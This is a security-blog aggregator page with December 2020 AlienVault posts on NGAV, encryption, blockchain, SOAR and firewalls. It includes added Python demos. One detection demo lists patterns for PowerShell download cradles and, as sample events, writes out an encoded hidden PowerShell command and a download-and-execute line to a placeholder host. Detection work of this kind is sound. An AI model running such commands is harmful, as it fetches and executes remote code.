something fun to unwrap Christmas morning. I checked on the rulesets, configs, and permissions, And rebooted each box for the sake of tradition. I waited for more but there wasn’t a peep, So I finished my wrapping and popped off to sleep. And after the coffee and presents and nog, The matching pajamas, the pickle, the grog, Video calls with our family and friends, Things had settled, so I went to tie up the loose ends. 
I ran strings right away and my jaw opened wide, For there, unencrypted, a message I spied: “2020’s been awful, with so much that you’ve missed Just to keep others healthy - so you made the Good List! And like all of your friends, I have had to stay distant, But your record’s been stellar, so the elves were insistent. You already have surplus gadgets that light up So I got you this PoC, and a CVE writeup. The binary is an iPhone zero-day, And I’ve left enough out that you’ll have room to play. And once you’ve dissected and filled in the blanks, And disclosed it responsibly, you can cash in my thanks! Thanks for staying inside this year, hunkering down, Thanks for wearing your mask, though you felt like a clown, Thanks for not hoarding groceries, and for learning to cook, Or for trying a language, or reading a book. And following rules from your state and your county. Now warm up your debugger, and cash in that bounty!”   
AlienVault.webp 2020-12-18 06:01:00 What is next gen antivirus? NGAV explained (lien direct) This blog was written by a third party author. What is next gen antivirus (NGAV) and how does it work? In contrast to legacy antivirus technology, next generation antivirus (NGAV) advances threat detection on the endpoint by looking for symptoms of malicious behavior across the whole endpoint system rather than fixating on known malware file attributes. NGAV uses artificial intelligence (AI) and machine learning algorithms to examine files, processes, applications, network activity, and user behavior to identify atypical activity that could indicate malicious attacks are unfolding on the endpoint. The models NGAV depends upon learn continually from historical and ongoing system behavior to develop baselines for what 'normal' looks like for a given activity. Real-time activity is then compared against these baselines. The predictive analytics get better over time at pinpointing anomalies that are likely to correspond to malicious behavior. This approach makes it possible to block new attack techniques in real time, before they have been identified and catalogued by security researchers. Comparing NGAV vs. legacy antivirus NGAV developed in response to the shortcomings of traditional file-based signatures and heuristics, which depend on prior knowledge of malware characteristics and behaviors to flag potential infections. Attackers learned long ago how to evade signature-based detection by creating polymorphic malware and otherwise changing the attributes of their malware so often that the useful life of a signature is nearly zero. According to recent figures, some 70% of all malware attacks today involve zero-day malware that evades signature detection through previously undocumented characteristics or behaviors. 
NGAV picks up on emerging threats like these because it doesn't require creating complicated rule sets in advance of the attack. Instead, it seeks out differences between the activity and the baseline to spot new behavior that's suspicious because it is outside the norm. Additionally, cybercriminals also increasingly utilize fileless attack techniques to avoid leaving tracks that could be detected through signatures. This includes utilizing macros, scripting engines and platforms like PowerShell, in-memory attacks, and other 'living off the land' attacks that don't require dropping files to carry out malicious ends.  According to a recent analysis, the most common critical-severity cybersecurity threat to endpoints was fileless malware, followed closely by dual-use PowerShell tools that are used in exploitation and post-exploitation behavior. All told, those make up 54% of threat tactics, compared to traditional malware like worms, banking trojans, and remote access tools (RATs), which all together only comprised 14% of tactics. Utilizing NGAV makes it possible to pick up on behavior from fileless attacks since it is not tied just to what the malware drops on the system, but instead keeps tabs on how the entire system is working. Why NGAV matters to cybersecurity programs According to Ponemon Institute, the average economic loss of a single endpoint breach now adds up to $8.94 million. More than five in 10 organizations say that their endpoint security solutions can't detect advanced attacks—respondents estimate that their legacy AV products miss an average of 60% of attacks. Respondents are also increasingly unsatisfied with traditional antivirus not only for what they don't detect, Malware Threat
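The NGAV entry above describes two ideas, a learned baseline of normal activity and behavioural indicators for fileless and PowerShell-based "living off the land" execution. The following is an added example, not code from the blog or from any NGAV product: it scores constructed process-creation events against a constructed parent/child baseline and a small set of command-line indicators (encoded commands, download cradles, hidden windows, execution-policy bypass), and raises an alert when the combined score crosses a threshold. The baseline, the indicator weights, the threshold and the events are all assumptions made for the example.

```python
# Added example (not from the blog): baseline-plus-behaviour scoring of process events.
# Baseline, indicator weights, threshold and sample events are constructed.
import re

# Constructed "learned" baseline: parent process -> children seen during normal operation.
BASELINE_PARENT_CHILD = {
    "explorer.exe": {"chrome.exe", "outlook.exe", "winword.exe", "powershell.exe"},
    "services.exe": {"svchost.exe"},
    "cmd.exe": {"powershell.exe", "ping.exe"},
}

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe", "rundll32.exe"}

# Indicators of script-based / living-off-the-land execution (weights are assumptions).
INDICATORS = [
    (re.compile(r"(?i)-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}"), 3, "encoded command"),
    (re.compile(r"(?i)\b(iex|invoke-expression)\b"), 3, "Invoke-Expression"),
    (re.compile(r"(?i)downloadstring|downloadfile|invoke-webrequest|\biwr\b"), 3, "download cradle"),
    (re.compile(r"(?i)-w(indowstyle)?\s+hidden"), 2, "hidden window"),
    (re.compile(r"(?i)-nop\b|-noprofile\b"), 1, "no profile"),
    (re.compile(r"(?i)-ep\s+bypass|-executionpolicy\s+bypass"), 2, "execution policy bypass"),
]

ALERT_THRESHOLD = 4   # assumed


def score_event(event):
    """Return (score, reasons) for one process-creation event."""
    score, reasons = 0, []
    parent, child = event["parent"].lower(), event["image"].lower()
    if child not in BASELINE_PARENT_CHILD.get(parent, set()):
        score += 3
        reasons.append("parent/child pair outside baseline: %s -> %s" % (parent, child))
    if child in SCRIPT_HOSTS:
        for pattern, weight, label in INDICATORS:
            if pattern.search(event["cmdline"]):
                score += weight
                reasons.append(label)
    return score, reasons


def alerts(events):
    """(pid, score, reasons) for every event at or above the threshold."""
    out = []
    for e in events:
        score, reasons = score_event(e)
        if score >= ALERT_THRESHOLD:
            out.append((e["pid"], score, reasons))
    return out


SAMPLE_EVENTS = [  # constructed, Sysmon-style process-creation events
    {"pid": 101, "parent": "explorer.exe", "image": "chrome.exe", "cmdline": "chrome.exe"},
    {"pid": 102, "parent": "cmd.exe", "image": "powershell.exe", "cmdline": "powershell.exe Get-Process"},
    {"pid": 103, "parent": "winword.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"pid": 104, "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"},
]

if __name__ == "__main__":
    for pid, score, reasons in alerts(SAMPLE_EVENTS):
        print(pid, score, "; ".join(reasons))
```

Event 102 is PowerShell launched from a baseline parent with a benign command line and scores nothing, which is the point of a baseline: the tool itself is dual-use. Event 103 (Office spawning a hidden, encoded PowerShell) and event 104 (a download cradle from an otherwise normal parent) are the fileless patterns the post refers to, and neither would match a file hash signature because nothing malicious is written to disk.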
AlienVault.webp 2020-12-16 11:00:00 2021 Cybersecurity in healthcare (lien direct) Breaches and cyberattacks are on the rise in the healthcare industry. The recent acceleration of digital technology and connectivity within Healthcare has led to significant patient care delivery improvements, more effective population health management, and better patient outcomes. With this increased technology and connectivity, however, comes increased exposure to cyberattacks that can impact patient care delivery, safety, and privacy. Cybersecurity Ventures predicts that Healthcare will suffer 2-3X more cyberattacks in 2021 than the average for other industries. Woefully inadequate security practices, weak and shared passwords, and vulnerabilities in code expose hospitals to perpetrators intent on hacking treasure troves of patient data. Ransomware attacks on healthcare organizations were predicted to quadruple between 2017 and 2020 and to grow to 5X by 2021, according to a report from Cybersecurity Ventures. The U.S. Department of Health and Human Services (HHS) Breach of Unsecured Protected Health Information portal lists 592 breaches of unsecured protected health information affecting 500 or more individuals, reported within the last 24 months, that are currently under investigation by the Office for Civil Rights. Three hundred six of the breaches were submitted in 2020. HIMSS 2020 Survey findings: A broad attack surface exists within many healthcare organizations due to a profound lack of resources. Relatively few healthcare organizations are conducting end-to-end security risk assessments. Many risks are unaddressed due to the lack of comprehensive security risk assessments. Furthermore, the legacy system footprint is growing within many healthcare organizations. Sensitive information is exposed, and such systems are vulnerable to attack. 
Diagnosis, prognosis and a prescription to help cure Diagnosis: Healthcare data is valuable on the black market; connected medical devices are vulnerable; availability of medical data is as vital as confidentiality and integrity; business associates carry security risk (supply chain); compliance regulations bring scrutiny; legacy systems (still running end-of-life operating systems). Prognosis: Threat intelligence on Healthcare; the future of telehealth in Healthcare; the post-COVID threat landscape shift. Prescription for cure: proactive best practices; lessons learned from the current diagnosis; digital risk management in Healthcare. Prescription to help cure: Verify that data is backed up frequently. Frequently test restore procedures on randomly selected files. Review the threat surface regularly and each time a system is implemented. Require strong, complex passwords and change them at regular intervals. Use only authorized software on the enterprise network environment. Use the “Principle of Least Privilege” approach to user accounts and data access. Establish controlled entry points for a remote netwo Threat
AlienVault.webp 2020-12-15 11:00:00 Why application-layer encryption is essential for securing confidential data (lien direct) This blog was written by an independent guest blogger. Your business is growing at a steady rate, and you have big plans for the future. Then, your organization gets hit by a cyberattack, causing a massive data breach.  Suddenly, your company’s focus is shifted to sending out letters to angry customers informing them of the incident - which is required by law in most states - and devising strategies to deal with the backlash. This is an all too common scenario for many businesses, and the unfortunate truth is that most organizations fail to adopt the correct cybersecurity procedures until after an attack. The good news is that with a proactive approach to protecting your data, these kinds of nightmares can be avoided. New technology is constantly providing hackers new opportunities to commit cybercrimes. Most organizations have encrypted their data, whether it’s stored in the cloud or on a server provided by their web host, but this isn’t enough. Even properly configured disk-level encryption leaves data exposed: it protects data at rest against loss or theft of the storage media, but once the system is running, every process and user that can reach the database or file system reads plaintext, and so does an attacker who compromises them.  In this article, we will discuss the weaknesses of disk-level encryption and why it’s best to ensure your data is encrypted at the application layer. We’ll also discuss the importance of active involvement from a cybersecurity team in the beginning stages of application development, and why developers need to have a renewed focus on cybersecurity in a “security-as-code” culture.  The importance of application-layer security Organizations all too often have a piecemeal, siloed approach to security. Increasingly competitive tech environments have pushed developers into building new products at a pace cybersecurity experts sometimes can’t keep up with. This is why it’s becoming more common for vulnerabilities to be detected only after an application launches or a data breach occurs. 
Application-layer encryption encrypts data inside the application, before it is handed to the database, file system or cloud storage, and reduces the attack surface accordingly: the storage tier, its backups and anyone with read access to them hold only ciphertext, so a compromise of one of those layers (or of one application) does not put the whole system’s data at risk. To keep that surface small, individual users and third parties should have access neither to the plaintext data nor to the keys; the keys live with the application or in a key management service, not alongside the data they protect. This leaves would-be cybercriminals with only the customer-facing end of the application for finding vulnerabilities, and that surface can be more easily protected and audited.  Building AI and application-layer security into code Application-layer security and building security into the code itself require that your DevOps and cybersecurity experts work closely together to form a DevSecOps dream team. Developers are increasingly working hand-in-hand with cybersecurity experts from the very beginning stages of software development to ensure a “security-as-code” culture is upheld.  However, there are some very interesting developments in AI that present opportunities to streamline this process. In fact, 78% of data scientists agree that artificial intelligence will have the greatest impact on data protection for the decade. Here are four ways AI is transforming application-layer security: 1. Misuse detection or application security breach detection Also referred to as signature-based detection, AI systems alert teams when familiar attack patterns are noticed. Data Breach Vulnerability Threat Deloitte
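The distinction the entry above draws, that disk-level encryption leaves plaintext visible to anything that can query the live system while application-layer encryption hands the storage tier only ciphertext, is easiest to see in code. The following is an added example, not code from the guest post: a customer store that encrypts designated fields before they reach its "database" (a dict standing in for the storage tier), binds each ciphertext to its row and column so values cannot be swapped between records, and authenticates ciphertexts so tampering is detected. To run with only the Python standard library it uses an encrypt-then-MAC construction with an HMAC-SHA256 keystream; that cipher choice is an illustration, and production code should use an AEAD such as AES-GCM from a vetted library, with the master key fetched from a KMS or HSM rather than hard-coded. The field names, the record contents and the key handling are assumptions for the example.

```python
# Added example (not from the blog): application-layer field encryption in front of storage.
# The stdlib-only encrypt-then-MAC construction is illustrative; use AES-GCM in production.
import hashlib
import hmac
import os


def _derive(master, purpose):
    """Derive independent sub-keys from the application's master key (HMAC based, HKDF-like)."""
    return hmac.new(master, purpose, hashlib.sha256).digest()


def _keystream(key, nonce, length):
    out, counter = b"", 0
    while len(out) < length:
        out += hmac.new(key, nonce + counter.to_bytes(4, "big"), hashlib.sha256).digest()
        counter += 1
    return out[:length]


def encrypt_field(master, aad, plaintext):
    """nonce || ciphertext || tag; 'aad' is authenticated context that is not encrypted."""
    enc_key, mac_key = _derive(master, b"enc"), _derive(master, b"mac")
    nonce = os.urandom(16)
    ct = bytes(p ^ k for p, k in zip(plaintext, _keystream(enc_key, nonce, len(plaintext))))
    tag = hmac.new(mac_key, aad + nonce + ct, hashlib.sha256).digest()
    return nonce + ct + tag


def decrypt_field(master, aad, blob):
    enc_key, mac_key = _derive(master, b"enc"), _derive(master, b"mac")
    nonce, ct, tag = blob[:16], blob[16:-32], blob[-32:]
    expected = hmac.new(mac_key, aad + nonce + ct, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, tag):
        raise ValueError("ciphertext, key or context does not match")
    return bytes(c ^ k for c, k in zip(ct, _keystream(enc_key, nonce, len(ct))))


class CustomerStore:
    """Application layer: sensitive fields are encrypted before they reach the storage tier."""
    ENCRYPTED = ("ssn", "card")   # assumed sensitive columns

    def __init__(self, master_key):
        self._key = master_key     # in practice fetched from a KMS/HSM, never stored with the data
        self.rows = {}             # stands in for the database / disk

    def _aad(self, customer_id, field):
        return ("%s:%s" % (customer_id, field)).encode()   # binds ciphertext to row and column

    def put(self, customer_id, record):
        row = {}
        for field, value in record.items():
            if field in self.ENCRYPTED:
                row[field] = encrypt_field(self._key, self._aad(customer_id, field), value.encode()).hex()
            else:
                row[field] = value
        self.rows[customer_id] = row

    def get(self, customer_id):
        row = dict(self.rows[customer_id])
        for field in self.ENCRYPTED:
            row[field] = decrypt_field(self._key, self._aad(customer_id, field), bytes.fromhex(row[field])).decode()
        return row

    def dump(self):
        """What an attacker with storage, backup or direct DB access sees."""
        return self.rows


if __name__ == "__main__":
    store = CustomerStore(os.urandom(32))
    store.put("c1", {"name": "Ada", "ssn": "123-45-6789", "card": "4111111111111111"})
    print(store.dump())   # name in clear, ssn and card as ciphertext
    print(store.get("c1"))
```

The dump is the "disk-level encryption is not enough" scenario: a dumped table, a stolen backup or a compromised database account yields the name but not the SSN or card number, because decryption needs the key held only by the application. The AAD binding means an attacker who can write to the database cannot move one customer's encrypted card number into another customer's row and have it decrypt.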
AlienVault.webp 2020-12-14 11:00:00 How secured are touchless solutions? (lien direct) This blog was written by an independent guest blogger. Image Source: TMC Touchless solutions have risen to the forefront this year because of the pandemic that has reshaped the way we work and live. When social distancing policies were put in motion, borders closed, establishments paused operations, and businesses moved online, operating amid lockdown. Touchless technologies had to be put in place almost everywhere to minimize physical contact. It has ceased to be just an option, since it is now a necessity in the new normal. And much like the physical epidemic that subjected the world to the pandemic, computer hackers have exploited the vulnerability of individuals, institutions, and networks at the height of the crisis. Here are a number of examples: Cyber attacks against Internet-exposed RDP ports soared from 3 million to 4.5 million between January and March 2020. Attempted security breaches increased after March as organizations moved to an unexpected remote working setup without comprehensive security planning. Phishing attacks linked to COVID-19 increased by 667%. DDoS attacks accounted for 45% of the recorded security threats, and 43% of those were password login attacks. The remainder were malware attacks, web threats, fraudulent DNS queries against client DNS servers, and unclassified attacks. Corporate ransomware attacks are up, as in the case of attacks against Honda in June 2020 and the severe outages triggered by the cyber assault against Garmin in July 2020. It has been confirmed that the attackers came from the Russian organization Evil Corp. Canon suffered a ransomware assault by the Maze ransomware gang in August, in which 10 TB (terabytes) of data, including private databases, were taken. Deployment of data-stealing malware such as remote access Trojans, infostealers, spyware, and banking Trojans using COVID-19 linked information as bait. 
Growing amounts of fake news or misinformation are circulating quickly among the public. In a cybercrime survey, around 30% of the countries that participated attested to the spread of false COVID-19 information. Other cyberattacks included fraud via mobile text messages. 3 Examples why we need secured touchless solutions Despite these attacks, there is still no doubt that the need for more touchless tech is urgent. How can touchless solutions be integrated into the workplace, schools, public utilities, and the like without compromising our security? 1. Opt to use personal instead of shared devices. We need cloud-based software, storage, and other solutions if we go touchless. Using cloud-based software on p Ransomware Malware Tool Vulnerability
AlienVault.webp 2020-12-10 11:00:00 How have digital transactions become safer? (lien direct) Image Source: Andrea Piacquadio from Pexels This blog was written by an independent guest blogger. With the emergence of cryptocurrencies and massive online marketplaces, keeping your financial information private is a bigger concern than ever. In addition to these new and developing areas, in-person purchasing with debit and credit cards continues to grow. From debit transactions to cryptocurrency, millions of transactions are made daily, and it is cybersecurity experts’ job to keep us safe. The symbiotic nature of technology and digital transactions means that as we develop more ways to spend money, experts find more ways to make transactions safe. Improvements in blockchain technology, decision analytics, and even debit and credit cards have made this more possible than ever. The creation of alternative currencies has pushed blockchain development forward, helping to ensure the safety of not only online transactions but financial transactions in general. The implementation of EMV chip technology is a major step in the world of digital and in-person transactions. With the use of EMV chips, paying with credit and debit cards becomes more secure than ever. So how have all of these advances combined to make digital transactions safer? Security and cryptocurrency Bitcoin, the first cryptocurrency, was developed in 2009. Other types of currency have emerged online in the last decade, but all of them exist within a volatile market, with their value and applications fluctuating at a high rate. Existing only in the realm of online markets, cryptocurrency and its ever-increasing popularity have had a distinct effect on security for all digital transactions. Blockchain technology is the basis for creating a cryptocurrency. 
Blockchain databases are built so that each new piece of data that is added, such as a transaction record, is put into its own “block.” Each new block carries a cryptographic hash of the previous one, which “chains” it to its predecessor: altering an earlier block changes its hash and breaks every link after it, so tampering is evident to anyone holding a copy. This creates a clear, chronological, tamper-evident timeline. Note what that does and does not provide: information stored this way is accessible, transparent, and easily tracked, which is integrity and auditability, not confidentiality; on a public chain the data is visible to everyone, so sensitive details must be kept off-chain or encrypted before they are written.  This tamper-evident, high-trust technology is what makes cryptocurrency transactions verifiable. The use of blockchain technology in financial transactions has contributed to the future of cryptocurrency as it becomes more available to the general public. Already, cryptocurrency has given more people access to safe, secure money. When this is combined with other cybersecurity tactics and theories, experts are in an excellent position to secure digital transactions. PINs and EMV chips PINs and signatures have been the mainstay of US transaction security for a long time. For credit cards, signatures are required, and with debit cards, a pri
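The chaining described in the entry above is a hash chain, and what it buys (tamper-evidence) is easiest to see by breaking one. The following is an added example, not code from the guest post or from any cryptocurrency: it appends transaction records as blocks, each carrying the SHA-256 hash of the previous block, and verifies the chain. The three transactions are constructed; consensus, signatures and mining are deliberately out of scope, because the point of the example is integrity versus confidentiality.

```python
# Added example (not from the blog): a minimal hash chain and its verification.
# Transactions are constructed; no consensus, signatures or mining are modelled.
import hashlib
import json

GENESIS_PREV = "0" * 64


def block_hash(block):
    """Hash of a block's content, which includes the previous block's hash."""
    canonical = json.dumps({k: block[k] for k in ("index", "prev_hash", "data")}, sort_keys=True)
    return hashlib.sha256(canonical.encode()).hexdigest()


def append_block(chain, data):
    prev_hash = chain[-1]["hash"] if chain else GENESIS_PREV
    block = {"index": len(chain), "prev_hash": prev_hash, "data": data}
    block["hash"] = block_hash(block)
    chain.append(block)
    return block


def verify_chain(chain):
    """Return the index of the first broken link, or -1 if every hash still matches."""
    for i, block in enumerate(chain):
        expected_prev = chain[i - 1]["hash"] if i else GENESIS_PREV
        if block["prev_hash"] != expected_prev or block["hash"] != block_hash(block):
            return i
    return -1


def build_sample_chain():
    chain = []
    for tx in ({"from": "alice", "to": "bob", "amount": 5},
               {"from": "bob", "to": "carol", "amount": 2},
               {"from": "carol", "to": "dave", "amount": 1}):   # constructed transactions
        append_block(chain, tx)
    return chain


if __name__ == "__main__":
    chain = build_sample_chain()
    print("intact:", verify_chain(chain))            # -1
    chain[1]["data"]["amount"] = 200                 # rewrite history
    print("after edit:", verify_chain(chain))        # 1
    chain[1]["hash"] = block_hash(chain[1])          # attacker re-hashes the edited block
    print("after re-hash:", verify_chain(chain))     # 2: the next block still points at the old hash
    print("readable by anyone:", chain[0]["data"])   # transparency, not confidentiality
```

Editing a block is detected immediately, and re-hashing the edited block only moves the break one link later, which is why an attacker has to rewrite every subsequent block (and, on a real chain, out-run the rest of the network) to change history. Nothing here hides the amounts or the parties: every holder of the chain reads them in clear.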
AlienVault.webp 2020-12-10 06:01:00 What is Security Orchestration Automation and Response? (lien direct) This blog was written by a third party author. With the face of cyberthreats in a constant state of flux, it’s nearly impossible for IT and Security teams to manually secure their countless systems, applications, services, and devices, as well as respond to potential and active cyberattacks that manage to flourish despite best efforts.  Because of the automated nature and sheer magnitude of cyberattacks today, organizations need toolsets that accelerate, simplify, and scale security efforts, strengthening their ability to protect their environment and respond to cyberthreats. One of the most effective ways is through SOAR. What is SOAR? The term SOAR (Security Orchestration, Automation, and Response) generally refers to three specific software capabilities used in tandem to improve your security posture: threat and vulnerability management, incident response, and security operations automation. The term itself, however, provides better insight into what a SOAR solution should do for your organization: Security Orchestration involves integrating typically disparate security tools and automating their processes to reduce complexity and increase the effectiveness of security operations. Security Automation aims to reduce human involvement in security tasks by using technology to automatically detect, prioritize, and remediate threats. Security Response refers to the planning, managing, monitoring, and reporting of incident response actions once a threat is detected. The overarching goal of SOAR is to make security operations far more responsive, decisive, impactful, and cost-effective. 
SIEM vs SOAR In order to detect threats, SOAR solutions act a bit like a Security Information and Event Management (SIEM) solution, monitoring and gathering data from various systems, platforms, and applications in an effort to identify anomalies that are potentially threatening.  But SIEM solutions are generally limited to alerting Security teams to the existence of the anomaly and do little to rectify the identified problem. In contrast, SOAR solutions go well beyond SIEM: first proactively assisting with protecting the environment through security orchestration, then providing the ability to automate security tasks that can be used in response to detected threats, and finally establishing workflow automation that chains those tasks together to respond more quickly and consistently than any member of the Security team could manually. Does this mean you should skip SIEM?  Absolutely not.  SIEM solutions are designed to connect with just about any security data source, whereas SOAR solutions are more focused on the O, the A, and the R. Many SOAR solutions integrate with SIEM solutions as another valuable source of security detail, so SIEM remains a needed part of your security strategy. The primary benefits of SOAR SOAR is more than just an opportunity to consolidate solutions and security functions; it’s a shift in the way your organization will proactively prevent attacks, gain insight into threatening actions, and more precisely and quickly respond to threats when they do occur.  Some of the key benefits to your organization include: Shortened Mean-Time-To-Respond (MTTR) – SOC and SecOps teams can respond to cyberthreats more quickly through automated response actions that can be performed instantly and automatically. The human factor can become a delay, especially in cases where it’s a verified known threat with a defined specific set of actions needed to remediate the attack. 
SOAR reduces the time to respond through the joint work of its functions. Vulnerability Threat
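The SOAR entry above ends on the case where automation pays off most: a verified known threat with a defined set of actions. The following is an added example, not code from the blog or from any SOAR product: a small playbook that enriches an alert, contains fully automatically only when the verdict is certain, contains-then-escalates for suspicious activity on a critical host, and otherwise opens a ticket for an analyst, while recording every action it orchestrated. The alert fields, the known-bad hash list, the host tiers and the tool stand-ins (which would be EDR, firewall and ticketing API calls in practice) are all constructed for the example.

```python
# Added example (not from the blog): a playbook with an automation gate.
# Alerts, the known-bad list and the tool stand-ins are constructed.
KNOWN_BAD_HASHES = {  # constructed threat-intel entry
    "9d4e2f5b0a1c3e7f8b6d2a4c1e0f9b8a7d6c5e4f3a2b1c0d9e8f7a6b5c4d3e2f",
}


class Tooling:
    """Stand-in for the orchestrated tools (EDR, firewall, ticketing); records every action taken."""

    def __init__(self):
        self.actions = []

    def isolate_host(self, host):
        self.actions.append(("isolate_host", host))

    def block_hash(self, sha256):
        self.actions.append(("block_hash", sha256))

    def open_ticket(self, alert_id, note):
        self.actions.append(("ticket", alert_id, note))


def enrich(alert):
    """Enrichment: hash reputation plus code-signing status (a real playbook queries threat intel here)."""
    if alert["sha256"] in KNOWN_BAD_HASHES:
        return "known_bad"
    if not alert.get("signed", True):
        return "suspicious"
    return "unknown"


def run_playbook(alert, tools):
    """Fully automatic only for a verified known threat; everything else keeps an analyst in the loop."""
    verdict = enrich(alert)
    if verdict == "known_bad":
        tools.block_hash(alert["sha256"])
        tools.isolate_host(alert["host"])
        tools.open_ticket(alert["id"], "auto-contained: known-bad hash")
        return "contained"
    if verdict == "suspicious" and alert.get("tier") == "critical":
        tools.isolate_host(alert["host"])     # contain first; the analyst decides the rest
        tools.open_ticket(alert["id"], "isolated pending analyst review")
        return "isolated_for_review"
    tools.open_ticket(alert["id"], "analyst triage required")
    return "escalated"


SAMPLE_ALERTS = [  # constructed SIEM alerts
    {"id": "A-1", "host": "ws-017", "signed": False, "tier": "standard",
     "sha256": "9d4e2f5b0a1c3e7f8b6d2a4c1e0f9b8a7d6c5e4f3a2b1c0d9e8f7a6b5c4d3e2f"},
    {"id": "A-2", "host": "db-01", "signed": False, "tier": "critical",
     "sha256": "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"},
    {"id": "A-3", "host": "ws-042", "signed": True, "tier": "standard",
     "sha256": "bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb"},
]


def triage_all(alerts):
    """Run the playbook over a batch; returns per-alert outcomes and the orchestration audit trail."""
    tools = Tooling()
    outcomes = {a["id"]: run_playbook(a, tools) for a in alerts}
    return outcomes, tools.actions


if __name__ == "__main__":
    outcomes, trail = triage_all(SAMPLE_ALERTS)
    print(outcomes)
    for action in trail:
        print(action)
```

The audit trail is what makes automated response defensible: every isolation and block is attributable to an alert and a verdict, and the two non-automatic branches show where the "human factor" the post mentions is kept on purpose, so that an unverified alert never isolates a production host without review.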
AlienVault.webp 2020-12-09 11:00:00 6 Information security predictions for 2021 (lien direct) This blog was written by an independent guest blogger. Maintaining appropriate information security measures will remain a priority for the foreseeable future, especially with people’s lives becoming increasingly digitized. Here are six trends to expect in the year ahead. 1.  An increase in the Zero-Trust approach Taking a zero-trust approach to data and infrastructure security means that an organization never automatically grants access to an employee based on their role in the company or any other characteristic. Instead, authentication and validation occur continuously as a person attempts to access various resources. The zero-trust option is becoming more widely utilized as company IT leaders come to terms with the rising costs of breaches and the fact that cybersecurity issues are happening more frequently. Government agencies traditionally used perimeter-based cybersecurity measures, but even those entities are slowly changing in favor of zero trust. In a recent example, the U.S. Navy used it during the COVID-19 pandemic to deal with the additional security risks of working from home. 2. Company leaders will look for simplicity and convergence in Cybersecurity solutions IT spending decreased in 2020, and analysts expect it to stay on the same track for 2021. That reality means that information security decision-makers will remain mindful of budget constraints as they choose what to buy in the coming year. For example, they will prioritize simplicity and convergence when evaluating possible solutions. The ability to integrate many products into a single platform would be even better from a cost-savings perspective. Secure access service edge (SASE) products are one category that experts anticipate will see growth this year, for example. If information security practitioners integrate as planned, they’ll save time as well as money. 3. 
Network security will more often include mobile device considerations Research shows that cybercriminals steal more than 24,000 records during each attack, at an average cost of $141 each. It’s easy to see how data breaches become so costly for businesses and why people at those entities must maintain a thorough data security approach. Part of their efforts should include tightening mobile security. Organizations will more often have mobile device security protocols in 2021. Those will stipulate which devices can use the network and which apps employees can access while connected to it. Devices will also have to be running up-to-date software before they are allowed onto the infrastructure. These requirements are crucial, especially considering how many people bring their own devices from home to access content at work. 4. More verifications on people trying to access resources People looking at what’s to come in the information security realm also expect a rise in identity-centric security. They believe that a verified identity will be necessary for accessing resources. However, they also say that attacks on the systems that maintain and secure verified identities will rise. Company leaders that choose to impl Guideline
AlienVault.webp 2020-12-08 11:00:00 Just released! AT&T Cybersecurity Insights™ Report: 5G and the Journey to the Edge (lien direct) We are certainly in unique times, with COVID driving digital transformation at an unprecedented pace, remote work appearing to be long term, and the specter of new threats looming over security professionals as they strategized how to protect a rapidly changing business and tech landscape.  To use perhaps one too many cliches: it is the best of times, it is the worst of times, the times are a changin’, and a change will do you good. No really, it will. The silver lining in all of this is that the transformations enterprises are making today sets the stage for the next generation of compute that will drive business globally — I am talking about 5G and edge computing. Not convinced? Take a peek into the just released AT&T Cybersecurity Insights™ Report: 5G and the Journey to the Edge, which is based on a global survey of 1,000 IT, security, and line-of-business leaders, research from IDC, and dozens of interviews with subject matter experts across security and networking. The report explores how 5G will impact security, including the opportunities for businesses to evolve their security approach and benefits of transitioning to 5G and the edge. Interestingly, data from the report clearly shows that many of the changes companies are making today, such as virtualizing security and network controls and focusing on frameworks like Zero Trust, are bringing them closer to what’s going to be required for securing 5G and the edge, as well as the IoT explosion both will drive. No, 5G infrastructure is not yet globally ubiquitous, but believe-you-me, the world is quickly marching toward that. 
According to IDC, mid-2020 saw 93 operators having deployed 5G networks across more than 40 countries, and IDC has forecasted that worldwide 5G connections will grow from 13.6 million in 2019 to 1.8 billion by 2024 — which means 5G will make up approximately 15% of all cellular-based mobile and IoT connections.  Enterprises are taking notice, with 93.5% worldwide researching, implementing, or having completed a 5G initiative, according to the AT&T global survey for the Insights Report. Yes, the train has left the station. Why? Because 5G and edge provide a leg up for business, and this is clearly being recognized: 60% of enterprises globally believe 5G and edge computing will help to provide a competitive advantage. And so, the digital transformation journey to the edge has begun. As enterprises make this transition, security is the top concern. No surprise, right? However, two key themes, which arose from our research for the Insights Report, are fundamentally shifting the conversation around security. First, security has truly moved from the basement to the boardroom, a change that was no doubt accelerated by COVID and the realization that enterprise networks and the security that protects them are absolutely integral to business continuity.  In other words, the digital transformation to 5G and edge computing is not happening without the security stakeholders at the table. Second, and perhaps more importantly, the way we approach security as we move to the future is absolutely going to change. Security leaders are acknowledging the challenge ahead in order to protect the business and minimize risks, while the enterprise attack surface grows exponentially larger and more complex because of the promise of billions of devices interconnecting in the future. How are they preparing? Here are some highlights from the report. Download your copy for the details. 
Zero Trust (ZT) has become a top priority, with 94% of enterprises researching, implementing, or having completed a ZT initiative. Security of data is key to moving into a 5G future. Data privacy, data loss and prevention, data encryption, and access to that data, inclu Threat Guideline ★★★★
AlienVault.webp 2020-12-07 17:49:00 What is a managed firewall? Benefits, offerings explained (lien direct) This blog was written by a third party author A firewall can have all the security bells and whistles to keep the bad guys out, but firewalls are only as effective as the people managing them. To get the most out of a firewall, it must be properly managed to ensure it does what it’s supposed to: mitigate threats targeting your business. What is a managed firewall? Monitoring your network can consume significant time, resources and costs. A managed firewall service, provided by a team of security experts, covers the administration, operation, monitoring, and maintenance of your firewall infrastructure. Depending on the offering, a managed firewall service may also involve an assessment of your security threats and monitoring of network traffic. Once the MSSP learns what “normal” traffic looks like, abnormal traffic patterns can be identified and acted on. Typically, managed firewall solutions include the set-up, maintenance, and modification of firewall rules as well as network monitoring. In addition, they often incorporate detailed analysis, reports and feedback. Patching and updates are commonly an essential part of the solution. Firewalls were never meant to be plug-and-play devices. You can’t just set one up, install it on your network perimeter, and hope it does its job without any human management or expertise. Firewall management requires a significant level of expertise and consistent 